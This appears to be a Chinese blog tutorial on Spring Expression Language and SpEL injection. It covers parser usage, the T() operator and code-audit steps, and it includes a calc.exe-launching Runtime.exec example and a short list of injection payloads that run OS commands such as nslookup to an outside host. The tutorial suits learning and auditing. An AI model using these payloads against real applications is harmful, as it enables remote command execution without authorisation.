SPEL简介
什么是SPEL
SPEL(Spring Expression Language),即Spring表达式语言,比JSP的EL更强大的一种表达式语言。特别是方法调用和基本的字符串模板功能。Spring框架的核心功能之一就是通过依赖注入的方式来管理Bean之间的依赖关系,而SpEl可以方便快捷的对ApplicationContext中的Bean进行属性的装配和提取。
表达式语言
上面说了spel是一种表达式语言,那么什么是表达式语言呢?
表达式/模板:在一些功能中,有一些固定的格式,只有部分变量,这样的情况下就需要使用模板,模板就是将固定的部分提取出来形成一个固定的模块,然后经过处理将变量填入其中。
我们可能还接触过类似的语言,如EL,OGNL。
EL:常用语JSP页面,简化JSP页面的操作
OGNL:struts中常见
SPEL的常用功能
从官方文档上可以看到SPEL支持下面的功能:
Literal expressions:文字表达式
Boolean and relational operators :布尔和关系运算符
Regular expressions:正则表达式
Class expressions:类表达式
Accessing properties, arrays, lists, maps:访问属性,数组,列表...
Method invocation:使用方法
Relational operators
Assignment
Calling constructors:调用构造方法
Bean references:Bean表达式,如果已使用 Bean 解析程序配置了评估上下文,则可以使用 (@) 符号从表达式中查找 Bean。
Array construction
Inline lists
Ternary operator
Variables:变量表达式
User defined functions:定义方法
Collection projection
Collection selection
Templated expressions:模块化表达式
SPEL是一种非常强大的表达式语言,从上面可以看出,它支持众多的操作,这些操作我们不必全部掌握,只要掌握与安全相关的
SPEL基本用法
接下来来学习一下SPEL的基本用法
如下面代码所示,首先通过SpelExpressionParser创建解析器,然后传入要评估的表达式,最后通过getValue执行表达式来获取最后的结果。
ExpressionParser parser = new SpelExpressionParser(); //创建解析器
Expression exp = parser.parseExpression("'Hello World'"); //传入需要评估的表达式
String message = (String) exp.getValue(); //执行表达式,然后获取值
上面说的比较简单,其实在很多情况下,评估表达式需要设置上下文,执行表达式时从上下文中取值。
上下文其实就是设置好某些变量的值,执行表达式时根据这些设置好的内容区获取值。
SpEL在求表达式值时一般分为四步,其中第三步可选:首先构造一个解析器,其次解析器解析字符串表达式,在此构造上下文,最后根据上下文得到表达式运算后的值。
如下,设置上下文时的操作
ExpressionParser parser = new SpelExpressionParser(); //创建解析器
EvaluationContext context = new StandardEvaluationContext("rui0"); //设置上下文 context.setVariable("variable", "ruilin"); //设置上下文,varibale=ruilin
String result1 = parser.parseExpression("#variable").getValue(context, String.class); //取值时传入上下文内容,然后执行表达式
SPEL语法
SpEL使用 #{...} 作为定界符,所有在大括号中的字符都将被认为是 SpEL表达式,我们可以在其中使用运算符,变量以及引用bean,属性和方法如:
引用其他对象:#{car}
引用其他对象的属性:#{car.brand}
调用其它方法 , 还可以链式操作:#{car.toString()}
除此以外在SpEL中,使用T()运算符会调用类作用域的方法和常量。例如,在SpEL中使用Java的Math类,我们可以像下面的示例这样使用T()运算符:
#{T(java.lang.Math)}
T()运算符的结果会返回一个java.lang.Math类对象。
SPEL常用功能介绍
1.类类型表达式(Class expressions)
SpEL中可以使用特定的Java类型,经常用来访问Java类型中的静态属性或静态方法,需要用T()操作符进行声明。括号中需要包含类名的全限定名,也就是包名加上类名。唯一例外的是,SpEL内置了java.lang包下的类声明,也就是说java.lang.String可以通过T(String)访问,而不需要使用全限定名。
因此我们通过 T() 调用一个类的静态方法,它将返回一个 Class Object,然后再调用相应的方法或属性。
如下,可以成功弹出计算机
ExpressionParser parser1 = new SpelExpressionParser(); //创建解析器
Expression exp1 = parser1.parseExpression("T(java.lang.Runtime).getRuntime().exec("calc.exe")");
Object value = exp1.getValue(); //执行表达式
2.方法的使用(Method invocation)
spel中可以调用一些方法,如下:
ExpressionParser parser2 = new SpelExpressionParser(); //创建解析器
Expression exp2 = parser2.parseExpression("'abc'.substring(2,3)"); //传入spel表达式,可以执行substring()方法
String message2 = (String) exp2.getValue(); //执行表示式
3.使用变量表达式(Variables)
变量定义通过EvaluationContext接口的setVariable(variableName, value)方法定义;在表达式中使用#variableName引用;
除了引用自定义变量,SpEL还允许引用根对象及当前上下文对象,
使用#root引用根对象,
使用#this引用当前上下文对象。
ExpressionParser parser = new SpelExpressionParser(); //创建解析器
EvaluationContext context = new StandardEvaluationContext("rui0"); //设置上下文 context.setVariable("variable", "ruilin"); //设置上下文,varibale=ruilin
String result1 = parser.parseExpression("#variable").getValue(context, String.class); //取值时传入上下文内容,然后执行表达式
4.模板表达式(Templated expressions)
表达式模板允许文字文本与一个或多个解析块的混合。你可以每个解析块分隔前缀和后缀的字符。当然,常见的选择是使用#{}作为分隔符。
ExpressionParser parser5 = new SpelExpressionParser(); //创建解析器
Expression exp5 = parser2.parseExpression("spel test is #{T(java.lang.Math).random()}",new TemplateParserContext()); //传入表达式模板
String message5 = (String) exp2.getValue(String.class); //执行表达式
SPEL注入
上面了解了SPEL的一些基础知识,下面来看一下SPEL导致的命令执行漏洞
漏洞原因
从上面的例子中,SPEL功能包含了执行类和方法的功能,如果输入可控,则就有安全风险。
SPEL注入的条件:
1)评估表达式外部可控
2)使用StandardEvaluationContext,如果没有说明,默认使用的也是StandardEvaluationContext
3)执行了getvalue()等执行表达式的操作
StandardEvaluationContext与SimpleEvaluationContext的区别
除了StandardEvaluationContext,还有SimpleEvaluationContext,他们的区别如下:
SimpleEvaluationContext:针对 不需要 SpEL 语言语法的全部范围并且应该 受到有意限制 的表达式类别,公开 SpEL 语言特性和配置选项的子集。
StandardEvaluationContext:公开 全套 SpEL 语言功能和配置选项。用户 可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
代码审计SPEL注入的过程
parseExpression()方法----StandardEvaluationContext()----getvalue()
代码中全局搜索parseExpression方法,看其输入是否可控,然后看使用的上下文是否是StandardEvaluationContext(默认的也是StandardEvaluationContext),最后看是否执行了getvalue等操作方法。
如果满足上面的要求,则说明存在SPEL注入。
SPEL注入常用Payload
${12*12}
T(java.lang.Runtime).getRuntime().exec("nslookup a.com")
T(Thread).sleep(10000)
#this.getClass().forName('java.lang.Runtime').getRuntime().exec('nslookup a.com')
new java.lang.ProcessBuilder({'nslookup a.com'}).start()
总结
SPEL注入是比较常见的漏洞,在各种框架中都有见到其身影,如SpringBoot SpEL表达式注入漏洞,Spring Data Commons远程代码执行漏洞(CVE-2018-1273)等等。
发表评论